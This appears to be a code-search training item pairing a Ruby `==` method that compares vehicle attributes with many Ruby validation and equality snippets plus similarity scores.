"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"vnic.FcIf\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"vnic.FcIf\"])\n return false unless object_type_validator.valid?(@object_type)\n return false if !@name.nil? && @name.to_s.length > 31\n return false if !@name.nil? && @name !~ Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n return false if !@static_wwpn_address.nil? && @static_wwpn_address !~ Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n type_validator = EnumAttributeValidator.new('String', [\"fc-initiator\", \"fc-nvme-initiator\", \"fc-nvme-target\", \"fc-target\"])\n return false unless type_validator.valid?(@type)\n return false if !@wwpn.nil? && @wwpn !~ Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n wwpn_address_type_validator = EnumAttributeValidator.new('String', [\"POOL\", \"STATIC\"])\n return false unless wwpn_address_type_validator.valid?(@wwpn_address_type)\n true && super\n end",
"def valid?\n validate_survivors and validate_items && validate_records\n end",
"def valid?\n return false if @id.nil?\n return false if @next_send.nil?\n return false if @rrule.nil?\n return false if @session.nil?\n return false if @last_sent.nil?\n return false if @contact_name.nil?\n return false if @parameters.nil?\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['Once', 'Hourly', 'Daily', 'Weekly', 'Monthly', 'Yearly'])\n return false unless type_validator.valid?(@type)\n return false if @summary.nil?\n return false if @text_parameters.nil?\n return false if @first_occurrence.nil?\n return false if @last_occurrence.nil?\n return false if @recipients_count.nil?\n return false if @timezone.nil?\n return false if @completed.nil?\n return false if @avatar.nil?\n return false if @created_at.nil?\n true\n end",
"def valid?\n return false if !@description.nil? && @description.to_s.length > 255\n return false if @routing_number.nil?\n return false if @routing_number.to_s.length > 9\n return false if @routing_number.to_s.length < 9\n return false if @account_number.nil?\n return false if @account_number.to_s.length > 17\n return false if @account_type.nil?\n account_type_validator = EnumAttributeValidator.new('String', [\"company\", \"individual\"])\n return false unless account_type_validator.valid?(@account_type)\n return false if @signatory.nil?\n return false if @signatory.to_s.length > 30\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^bank_[a-zA-Z0-9]+$/)\n return false if !@signature_url.nil? && @signature_url !~ Regexp.new(/^https:\\/\\/lob-assets\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if @date_created.nil?\n return false if @date_modified.nil?\n return false if @object.nil?\n object_validator = EnumAttributeValidator.new('String', [\"bank_account\"])\n return false unless object_validator.valid?(@object)\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @account_id.nil?\n return false if @organization_id.nil?\n return false if @product_id.nil?\n return false if @product_rate_plan_id.nil?\n return false if @name.nil?\n type_validator = EnumAttributeValidator.new('String', [\"Subscription\", \"FixedTerm\", \"Trial\"])\n return false unless type_validator.valid?(@type)\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"Trial\", \"Provisioned\", \"Paid\", \"AwaitingPayment\", \"Cancelled\", \"Failed\", \"Expired\"])\n return false unless state_validator.valid?(@state)\n return false if @initial_period_start.nil?\n return false if @trial_end.nil?\n managed_by_validator = EnumAttributeValidator.new('String', [\"BillForward\", \"Stripe\"])\n return false unless managed_by_validator.valid?(@managed_by)\n return false if @version_start.nil?\n return false if @version_number.nil?\n return false if @current_time.nil?\n failed_payment_behaviour_validator = EnumAttributeValidator.new('String', [\"CancelSubscription\", \"None\"])\n return false unless failed_payment_behaviour_validator.valid?(@failed_payment_behaviour)\n return true\n end",
"def validate_fields\n %w[email author].each do |field|\n value = self.send(field)\n abort \"Hoe #{field} value not set. aborting\" if value.nil? or value.empty?\n end\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length < 1\n return false if @timezone.nil?\n return false if @timezone.to_s.length < 1\n return false if @currency.nil?\n return false if @currency.to_s.length < 1\n case_sensitivity_validator = EnumAttributeValidator.new('String', [\"sensitive\", \"insensitive-uppercase\", \"insensitive-lowercase\"])\n return false unless case_sensitivity_validator.valid?(@case_sensitivity)\n campaign_priority_validator = EnumAttributeValidator.new('String', [\"universal\", \"stackable\", \"exclusive\"])\n return false unless campaign_priority_validator.valid?(@campaign_priority)\n exclusive_campaigns_strategy_validator = EnumAttributeValidator.new('String', [\"listOrder\", \"lowestDiscount\", \"highestDiscount\"])\n return false unless exclusive_campaigns_strategy_validator.valid?(@exclusive_campaigns_strategy)\n default_discount_scope_validator = EnumAttributeValidator.new('String', [\"sessionTotal\", \"cartItems\", \"additionalCosts\"])\n return false unless default_discount_scope_validator.valid?(@default_discount_scope)\n default_discount_additional_cost_per_item_scope_validator = EnumAttributeValidator.new('String', [\"price\", \"itemTotal\", \"additionalCosts\"])\n return false unless default_discount_additional_cost_per_item_scope_validator.valid?(@default_discount_additional_cost_per_item_scope)\n true\n end",
"def valid?\n run_validation\n @errors.empty?\n end",
"def valid?\n MANDATORY_ATTRIBUTES.each{|a| return false unless self[a]}\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @token.nil?\n return false if @tipo.nil?\n tipo_validator = EnumAttributeValidator.new('String', ['fatture', 'proforma', 'ordini', 'preventivi', 'ndc'])\n return false unless tipo_validator.valid?(@tipo)\n return false if @nome.nil?\n return false if @indirizzo_via.nil?\n return false if @indirizzo_cap.nil?\n return false if @indirizzo_citta.nil?\n return false if @indirizzo_provincia.nil?\n return false if @paese.nil?\n lingua_validator = EnumAttributeValidator.new('String', ['it', 'en', 'de'])\n return false unless lingua_validator.valid?(@lingua)\n return false if @piva.nil?\n return false if @cf.nil?\n return false if @numero.nil?\n return false if @valuta.nil?\n return false if @valuta_cambio.nil?\n return false if @prezzi_ivati.nil?\n return false if @importo_netto.nil?\n return false if @importo_iva.nil?\n return false if @importo_totale.nil?\n mostra_totali_validator = EnumAttributeValidator.new('String', ['tutti', 'netto', 'nessuno'])\n return false unless mostra_totali_validator.valid?(@mostra_totali)\n return false if @lista_articoli.nil?\n pa_tipo_cliente_validator = EnumAttributeValidator.new('String', ['PA', 'B2B'])\n return false unless pa_tipo_cliente_validator.valid?(@pa_tipo_cliente)\n pa_tipo_validator = EnumAttributeValidator.new('String', ['ordine', 'convenzione', 'contratto', 'nessuno'])\n return false unless pa_tipo_validator.valid?(@pa_tipo)\n pa_esigibilita_validator = EnumAttributeValidator.new('String', ['I', 'D', 'S', 'N'])\n return false unless pa_esigibilita_validator.valid?(@pa_esigibilita)\n true\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def valid?\n return false if @name.nil?\n return false if @name.to_s.length > 50\n return false if @prefix_suffix_option.nil?\n prefix_suffix_option_validator = EnumAttributeValidator.new('String', [\"Prefix\", \"Suffix\"])\n return false unless prefix_suffix_option_validator.valid?(@prefix_suffix_option)\n return false if !@invoice_pre_suffix.nil? && @invoice_pre_suffix.to_s.length > 5\n application_units_validator = EnumAttributeValidator.new('String', [\"Amount\", \"Hours\", \"Incidents\"])\n return false unless application_units_validator.valid?(@application_units)\n application_cycle_validator = EnumAttributeValidator.new('String', [\"Contract2Weeks\", \"Contract4Weeks\", \"ContractYear\", \"CalendarMonth\", \"CalendarQuarter\", \"CalendarWeek\", \"ContractQuarter\", \"CalendarYear\"])\n return false unless application_cycle_validator.valid?(@application_cycle)\n return false if @employee_comp_rate.nil?\n employee_comp_rate_validator = EnumAttributeValidator.new('String', [\"Actual\", \"Hourly\"])\n return false unless employee_comp_rate_validator.valid?(@employee_comp_rate)\n return false if @employee_comp_not_exceed.nil?\n employee_comp_not_exceed_validator = EnumAttributeValidator.new('String', [\"Billing\", \"Percent\", \"Amount\"])\n return false unless employee_comp_not_exceed_validator.valid?(@employee_comp_not_exceed)\n return false if @invoicing_cycle.nil?\n invoicing_cycle_validator = EnumAttributeValidator.new('String', [\"CalendarYear\", \"ContractYear\"])\n return false unless invoicing_cycle_validator.valid?(@invoicing_cycle)\n return false if !@invoice_description.nil? && @invoice_description.to_s.length > 4000\n return false if @bill_time.nil?\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n return false if @bill_expenses.nil?\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n return false if @bill_products.nil?\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n return true\n end",
"def validate\n end",
"def valid?\n return false if @to.nil?\n return false if @from.nil?\n carrier_validator = EnumAttributeValidator.new('String', [\"USPS\"])\n return false unless carrier_validator.valid?(@carrier)\n return false if @date_created.nil?\n return false if @date_modified.nil?\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^ltr_[a-zA-Z0-9]+$/)\n return false if !@template_id.nil? && @template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@template_version_id.nil? && @template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n return false if !@url.nil? && @url !~ Regexp.new(/^https:\\/\\/(lob-assets|lob-assets-staging)\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if @object.nil?\n object_validator = EnumAttributeValidator.new('String', [\"letter\"])\n return false unless object_validator.valid?(@object)\n return false if !@description.nil? && @description.to_s.length > 255\n return false if !@tracking_events.nil? && @tracking_events.length > 0\n address_placement_validator = EnumAttributeValidator.new('String', [\"top_first_page\", \"insert_blank_page\", \"bottom_first_page_center\", \"bottom_first_page\"])\n return false unless address_placement_validator.valid?(@address_placement)\n true\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def valid_attributes\n {}\n end",
"def supports_validations?\n true\n end",
"def valid?\n @errors = self.class.valid_against_schema?(self.class.json_schema, self)\n @errors.empty?\n end",
"def valid?\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n end",
"def valid?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@last_name.nil? && @last_name.to_s.length > 30\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@country.nil? && @country.to_s.length > 50\n return false if !@security_identifier.nil? && @security_identifier.to_s.length > 184\n return false if !@title.nil? && @title.to_s.length > 100\n return false if !@school.nil? && @school.to_s.length > 50\n return false if !@nick_name.nil? && @nick_name.to_s.length > 30\n return false if !@significant_other.nil? && @significant_other.to_s.length > 30\n return false if !@portal_password.nil? && @portal_password.to_s.length > 15\n return false if !@portal_security_level.nil? && @portal_security_level > 6.0\n return false if !@portal_security_level.nil? && @portal_security_level < 1.0\n gender_validator = EnumAttributeValidator.new('String', [\"Male\", \"Female\"])\n return false unless gender_validator.valid?(@gender)\n presence_validator = EnumAttributeValidator.new('String', [\"Online\", \"DoNotDisturb\", \"Away\", \"Offline\", \"NoAgent\"])\n return false unless presence_validator.valid?(@presence)\n return true\n end",
"def validated?; end",
"def valid?\n return false if @name.nil?\n return false if @slug.nil?\n return false if @status.nil?\n status_validator = EnumAttributeValidator.new('String', ['enabled', 'disabled'])\n return false unless status_validator.valid?(@status)\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['digital', 'physical'])\n return false unless type_validator.valid?(@type)\n return false if @sku.nil?\n return false if @price.nil?\n availability_validator = EnumAttributeValidator.new('String', ['available', 'comingSoon', 'retired'])\n return false unless availability_validator.valid?(@availability)\n stock_status_validator = EnumAttributeValidator.new('String', ['available', 'alert', 'unavailable'])\n return false unless stock_status_validator.valid?(@stock_status)\n return false if @categories.nil?\n true\n end",
"def valid?\n self.valid\n end"
] |
[
"0.78992486",
"0.78992486",
"0.70971805",
"0.70782334",
"0.7032205",
"0.7031276",
"0.69510347",
"0.6869891",
"0.6858077",
"0.6858077",
"0.68287027",
"0.6823878",
"0.6820306",
"0.68144894",
"0.6794656",
"0.6752167",
"0.66843414",
"0.6676546",
"0.6667755",
"0.66296124",
"0.66184515",
"0.6608204",
"0.6599208",
"0.6594276",
"0.6584302",
"0.6580472",
"0.6578095",
"0.6558585",
"0.6555879",
"0.6542414",
"0.6536983",
"0.6533884",
"0.65315515",
"0.65311855",
"0.65267456",
"0.65258855",
"0.6520786",
"0.65205675",
"0.6511026",
"0.6498394",
"0.64966303",
"0.64935124",
"0.6491113",
"0.64885867",
"0.6479024",
"0.6473706",
"0.64679337",
"0.6467217",
"0.6461245",
"0.64601135",
"0.64553183",
"0.64540446",
"0.6447954",
"0.64393955",
"0.6434162",
"0.64312094",
"0.6428205",
"0.6426148",
"0.6412439",
"0.64070046",
"0.64044213",
"0.6403482",
"0.6399368",
"0.63979715",
"0.63858813",
"0.63855004",
"0.63855004",
"0.63855004",
"0.63855004",
"0.63740236",
"0.6367379",
"0.63645166",
"0.6362151",
"0.63599974",
"0.6357385",
"0.63549066",
"0.63549066",
"0.63549066",
"0.63549066",
"0.6354845",
"0.6354207",
"0.6350302",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.6344303",
"0.63435715",
"0.63406414",
"0.63344824",
"0.6333158",
"0.63313466",
"0.63294095",
"0.6327076"
] |
0.0
|
-1
|
Checks equality by comparing each attribute.
|
def ==(o)
  return true if self.equal?(o)
  self.class == o.class &&
    year == o.year &&
    make == o.make &&
    model == o.model &&
    trim == o.trim &&
    short_trim == o.short_trim &&
    body_type == o.body_type &&
    body_subtype == o.body_subtype &&
    vehicle_type == o.vehicle_type &&
    transmission == o.transmission &&
    drivetrain == o.drivetrain &&
    fuel_type == o.fuel_type &&
    engine == o.engine &&
    engine_size == o.engine_size &&
    engine_block == o.engine_block &&
    doors == o.doors &&
    cylinders == o.cylinders &&
    made_in == o.made_in &&
    steering_type == o.steering_type &&
    antibrake_sys == o.antibrake_sys &&
    tank_size == o.tank_size &&
    overall_height == o.overall_height &&
    overall_length == o.overall_length &&
    overall_width == o.overall_width &&
    std_seating == o.std_seating &&
    opt_seating == o.opt_seating &&
    highway_miles == o.highway_miles &&
    city_miles == o.city_miles &&
    engine_measure == o.engine_measure &&
    engine_aspiration == o.engine_aspiration &&
    trim_r == o.trim_r
end
|
{
  "objective": {
    "self": [],
    "paired": [],
    "triplet": [
      [
        "query",
        "document",
        "negatives"
      ]
    ]
  }
}
|
[
"def ==(other)\n attributes == other.attributes\n end",
"def ==(other) # :nodoc:\n @attrs == other.attrs\n end",
"def eql?(other)\n return true if self == other\n @@ATTRIBUTES.each do |att|\n return false unless self.send(att).eql?(other.send(att))\n end\n true\n end",
"def assert_equal_attributes(object, expected_attributes)\n expected_attributes.each do |index, value|\n assert_equal value, object[index], \"#{index}\"\n end\n end",
"def attr_equal?(o)\n self == o and\n self.instance_variables_compare(o).empty? and\n self.attributes == o.attributes\n end",
"def same_attributes?(spec)\n @@attributes.all? {|name, default| self.send(name) == spec.send(name) }\n end",
"def ==(other)\n self.class.valid_attrs.each do |attr|\n return false if read(attr) != other.read(attr)\n end\n true\n end",
"def ==(other)\n self.attributes == (other.respond(:attributes) || {} )\n end",
"def ==(other)\n other.present? && self.attributes == other.attributes\n end",
"def ==(other)\n return false if other.nil? || !other.respond_to?(:attributes)\n attributes == other.attributes\n end",
"def match?(attributes)\n attributes.each do |attr, val|\n return false if send(attr).to_s != val.to_s\n end\n true\n end",
"def ==(other)\n self.class == other.class &&\n self.attributes == other.attributes\n end",
"def ==(other)\n self.class == other.class &&\n attributes == other.attributes\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.send(name) }\n end",
"def changed?(comparison)\n attributes.any? do |attribute, value|\n next unless comparison.key?(attribute)\n comparison[attribute] != value\n end\n end",
"def ==(other)\n return false unless self.class == other.class\n self.attributes == other.attributes\n end",
"def ==(other)\n if other.kind_of? Details::Attribute\n self.name == other.name && self.value == other.value\n else\n self.value == other\n end\n end",
"def ==(other)\n return false unless other.instance_of? self.class\n attributes == other.attributes\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n return super unless other.is_a?(self.class)\n\n attributes.all? { |name, value| value == other.attributes[name] }\n end",
"def ==(other)\n Attribute === other && \n !(Expression === other) &&\n relation == other.relation && \n name == other.name && \n self.alias == other.alias && \n original_relation == other.original_relation\n end",
"def ==(obj)\n if obj.instance_of?(self.class)\n compare_attributes = [\"category_id\", \"combo_item_id\", \"quantity\", \"sequence\"]\n compare_attributes.each do |field|\n if self.send(field) != obj.send(field)\n return false\n end\n end\n return true\n end\n return false\n end",
"def ==(other)\n return false if other.class != self.class\n attr_hash == other.attr_hash\n end",
"def ==(other)\n case other\n when Chair::Row\n @attributes == other.instance_variable_get('@attributes')\n when Array\n @attributes.values == other\n else false\n end\n end",
"def == other\n return false unless other.kind_of? self.class\n attribute_of.all? do |key, val|\n val.get == other.__send__(key)\n end\n end",
"def correct_combination?(attr1, attr2, attr3)\n result = false\n if attr1 == attr2 && attr2 == attr3\n result = true\n elsif attr1 != attr2 && attr2 != attr3 && attr1 != attr3\n result = true\n end\n return result\n end",
"def ==(other)\n return false if self.class != other.class\n return super if @_lazer_model.required_properties.empty?\n @_lazer_model.required_properties.each do |key_name|\n return false if read_attribute(key_name) != other.read_attribute(key_name)\n end\n true\n end",
"def eql?(other)\n other.is_a?(self.class) && !self.class.comparison_attrs.find{|a| send(a) != other.send(a)}\n end",
"def verify_attributes(hash, expected)\n return [] unless expected.attributes\n expected.attributes.map{ |a| verify_attribute_value(hash[a.name.to_s], a) }\n end",
"def assert_attributes obj, attr_hash\n default_attr_hash = {}\n if obj.respond_to? :default_attr_hash\n default_attr_hash = obj.default_attr_hash\n end\n default_attr_hash.merge(attr_hash).each_pair do |key, value|\n assert_equal value, obj.__send__(key), \"Attribute #{key} of #{obj}\"\n end\n end",
"def match_attributes(attrs)\n attrs = Saxxy::Helpers.stringify_keys(attrs)\n attributes.reduce(true) do |b, (k, v)|\n value = attrs[k]\n b && ((!value.nil? && match(v, value)) || (v.nil? && value.nil?))\n end\n end",
"def equal_set(expected)\n message = \"#{Helpers.inspect_records(@object)} has the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id).sort\n right = expected.map(&:id).sort\n \n test_case.assert(left != right, message)\n end",
"def ===(other)\n required = self.class.required_attributes\n\n other.respond_to?(:keys) && (common = other.keys & required) &&\n common.size == other.keys.size && common.size == required.size\n end",
"def bt_same_value?(other)\n bt_value_attributes == other.bt_value_attributes\n end",
"def ==(x)\n return true if object_id == x.object_id\n return false unless x.kind_of?(AttrArray)\n each_with_index do |a, n|\n return false unless a == x[n]\n end\n true\n end",
"def equal_set(expected)\n message = \"#{Helpers.inspect_records(@object)} does not have the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id).sort\n right = expected.map(&:id).sort\n \n test_case.assert(left == right, message)\n end",
"def compare_attributes(data_criteria, criteria)\n return false unless data_criteria['dataElementAttributes']&.any?\n\n data_criteria['dataElementAttributes'].map { |dc| dc.except('_id') }.include? criteria['dataElementAttributes'][attribute_index].except('_id')\n end",
"def ==(other)\n @klass == other.class && @attributes == strip_active_record(other)\n end",
"def ==(other)\n other.is_a?(self.class) &&\n other.attribute == attribute &&\n other.validation == validation &&\n other.expected == expected &&\n other.actual == actual\n end",
"def == other\n return false unless self.class == other.class\n [:unit, :frequency, :anchor, :weeks, :monthdays, :weekdays, :times].all? do |attribute|\n self.send(attribute) == other.send(attribute)\n end\n end",
"def compare_equal?(item, line_item)\n ![\n :ax_account_number,\n :ax_account_id,\n :ax_order_number,\n :ax_order_id,\n :email_address,\n :first_name,\n :last_name,\n :serial_number,\n :purch_order_form_num\n ].detect { |attr| item.send(attr) != line_item.send(attr) }\n end",
"def ==(b) # :nodoc:\n ( b.respond_to?(:result_attributes) &&\n result_attributes == b.result_attributes && \n @result_attributes.all?{ |k| send(k) == b.send(k) } )\n end",
"def validates_different(*attr_names)\n validates_with ValidatesAll::DifferenceValidator, _merge_attributes(attr_names)\n end",
"def identical?\n #Song.first.attributes.each { |v,k| Song.find(:all, :conditions => [\" #{v} like ?\", \"%blah%\"])}\n Song.find(:all, :conditions => [\"name = ? or length = ?\", \"#{self.name}\", self.length]) do |x| \n x.hash == self.hash\n end\n end",
"def diff?(model = self.class.find(id))\n self.class.diffable_attributes.each do |attribute|\n return true if send(attribute) != model.send(attribute)\n end\n return false\n end",
"def filter_attributes_match?(hash_one, hash_two)\n hash_one.all? do |key, value_one|\n value_two = hash_two[key]\n case\n when value_one == value_two\n true\n when value_one.is_a?(Hash) && value_two.is_a?(Hash)\n filter_attributes_match?(value_one, value_two)\n when hash_one[key].to_s == hash_two[key].to_s\n true\n when value_one.is_a?(String) && value_one.start_with?(\"eval:\")\n eval_attribute_value(value_one, value_two)\n else\n false\n end\n end\n end",
"def comparable_attributes\n#\t\tHashWithIndifferentAccess[attributes.select {|k,v| \n#\t\t\t!Abstract.incomparable_attribute_names.include?(k)}]\n\t\tHashWithIndifferentAccess[attributes.select {|k,v| db_fields.include?(k)}]\n\tend",
"def all_equal?\n a = self.first\n all? { |b| a == b }\n end",
"def check_attrs(attr_list)\r\n attrs = []\r\n attr_list.each do |attr_sym|\r\n attr = assigns(attr_sym.to_sym)\r\n assert_not_nil attr, \"Attribute @#{attr_sym} should not be nil\"\r\n assert !attr.new_record?, \"Should have saved the @#{attr_sym} obj\" if attr.class == ActiveRecord\r\n attrs << attr\r\n end\r\n attrs.length > 1 ? attrs : attrs[0]\r\n end",
"def check_attrs(attr_list)\r\n attrs = []\r\n attr_list.each do |attr_sym|\r\n attr = assigns(attr_sym.to_sym)\r\n assert_not_nil attr, \"Attribute @#{attr_sym} should not be nil\"\r\n assert !attr.new_record?, \"Should have saved the @#{attr_sym} obj\" if attr.class == ActiveRecord\r\n attrs << attr\r\n end\r\n attrs.length > 1 ? attrs : attrs[0]\r\n end",
"def attr_set?(cards, attr)\n array = []\n cards.each do |card|\n # evalutes the string 'attr' and returns the value\n array << card.send(attr)\n end\n\n # only return true if it's all the same or totally different\n return true if array.uniq.count == 1\n return true if array.uniq.count == 3\n return false\n end",
"def attribute_changed?(attribute_name)\n (self.diff['attributes']['new']||{})[attribute] != (self.diff['attributes']['old']||{})[attribute]\n end",
"def eql?(other)\n return false if (other.nil? or self.class != other.class)\n return false unless super(other)\n return false unless self.attributes == other.attributes\n return false unless self.nodes == other.nodes\n true\n end",
"def eql?(other)\n return false unless self.class == other.class\n self.key_attributes == other.key_attributes\n end",
"def uniquify_attributes(attributes)\n attributes.each do |ka|\n oldval = send(ka)\n next unless String === oldval\n newval = UniquifierCache.instance.get(self, oldval)\n set_property_value(ka, newval)\n logger.debug { \"Reset #{qp} #{ka} from #{oldval} to unique value #{newval}.\" }\n end\n end",
"def eql?(object)\n self.class.equal?(object.class) && attributes == object.attributes\n end",
"def multi_element_attr_check( elements )\n wanted = Array.new\n found = Array.new\n elements.each do |element|\n print \".\"\n e = $driver.find_element(element[0].to_sym, element[1])\n wanted << [ element[1], element[2], element[3] ]\n found << [ element[1], element[2], e.attribute(element[2]) ]\n end\n\n found.should == wanted\n end",
"def equals(rule)\n element == rule.element && attributes == rule.attributes\n end",
"def attr_reader(*args)\n super\n comparison_attrs.concat(args)\n end",
"def xml_nodes_match_attrs(xml_nodes, attrs, mismatches = [])\n attrs.each_with_index.each { |attr_set, idx|\n xn = xml_nodes[idx]\n attr_set.each { |(attr_key, attr_val)|\n # Either call method, or hash key, or recurse on children\n # p.name vs. p[:name]\n if :children == attr_key\n # recurse over children\n xml_nodes_match_attrs(xn.children, attr_val, mismatches)\n else\n # compare attrs\n xn_val = xn.methods.include?(attr_key) ? xn.send(attr_key) : xn[attr_key]\n if xn_val != attr_val\n mismatches << { node: xn.name_and_class_path, attr: \"#{ attr_key }: expected #{ attr_val.inspect }, got #{ xn_val.inspect }\" }\n end\n end\n }\n }\n mismatches\n end",
"def matches_state_attrs?\n @expected_attrs == state_attrs\n end",
"def equal_list(expected)\n message = \"#{Helpers.inspect_records(@object)} has the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id)\n right = expected.map(&:id)\n \n test_case.assert(left != right, message)\n end",
"def eql?(other)\n return false unless super(other)\n return false unless attributes == other.attributes\n return false unless content == other.content\n\n true\n end",
"def ==(other)\n return true if other.equal?(self)\n return false unless other.instance_of?(self.class)\n\n self.class.attributes.inject(true) do |memo, attribute|\n attribute_name = attribute.first\n attribute_type = attribute.last[:type]\n\n # Skip associations\n if attribute_type.include?(LazyResource::Resource) || (attribute_type.is_a?(::Array) && attribute_type.first.include?(LazyResource::Resource))\n memo\n else\n memo && self.send(:\"#{attribute_name}\") == other.send(:\"#{attribute_name}\")\n end\n end\n end",
"def matches? item, attributes\n\n attributes.map { |attribute, value|\n\n item.send(attribute) == value\n\n }.flatten == [true]\n\n end",
"def ==( other ) \n\t\t\tcomparison_attributes = lambda{ |area| [ area.area_desc, area.altitude, area.ceiling, area.circles, area.geocodes, area.polygons ]}\n\t\t\tcomparison_attributes.call( self ) == comparison_attributes.call( other )\n\t\tend",
"def all_obs_same_attr?(observations, attr)\n exemplar = observations.first.send(attr)\n observations.all? { |o| o.send(attr) == exemplar }\n end",
"def eql?(*) end",
"def eql?(other)\n return true if equal?(other)\n return false unless self == other\n [:id, :fide_id, :rating, :fide_rating, :title, :gender].each do |m|\n return false if self.send(m) && other.send(m) && self.send(m) != other.send(m)\n end\n true\n end",
"def match\n @matches = attributes_enumerator.map do |(type, value), index|\n attribute_name = self.class.names[index]\n attributes.store(\n attribute_name, type.match(value, context: @context.dup)\n )\n end\n return if (failures = @matches.select(&:invalid?)).empty?\n failures.unshift(failure).reduce(:merge!)\n end",
"def ==(val)\n if val.is_a?(Model)\n # Use normal comparison for a model\n super\n else\n # Compare to attributes otherwise\n attributes == val\n end\n end",
"def ==(o)\n return true if self.equal?(o)\n self.class == o.class &&\n attribute == o.attribute &&\n statistics == o.statistics &&\n other == o.other &&\n total == o.total &&\n missing == o.missing &&\n term_count == o.term_count &&\n term_type == o.term_type &&\n terms == o.terms\n end",
"def ==(*several_variants)\n #This is a stub, used for indexing\n end",
"def is_equal?(a)\n @amount == a.amount && @code == a.code\n end",
"def equal_list(expected)\n message = \"#{Helpers.inspect_records(@object)} does not have the same records as #{Helpers.inspect_records(expected)}\"\n \n left = @object.map(&:id)\n right = expected.map(&:id)\n \n test_case.assert(left == right, message)\n end",
"def comparison_attributes\n except_list = ['id', 'updated_at', 'created_at', 'verified_at']\n except_list << 'alternative_phone' unless Spree::Config[:alternative_shipping_phone]\n except_list << 'company' unless Spree::Config[:company]\n\n a = attributes.except(*except_list)\n a.each{|k, v|\n if v.is_a?(String)\n v = v.downcase.strip.gsub(/\\s+/, ' ')\n a[k] = v.present? ? v : nil\n end\n }\n a['state_name'] = nil if a['state_name'].blank?\n a\n end",
"def multi_element_attr_match( elements )\n elements.each do |element|\n print \".\"\n wait_for_element(element[0].to_sym, element[1])\n check_attribute_match(element[0].to_sym, element[1], element[2], element[3])\n end\n end",
"def xml_should_eql(actual, expected)\n same = xml_cmp(actual, expected)\n actual.should.== expected unless same \nend",
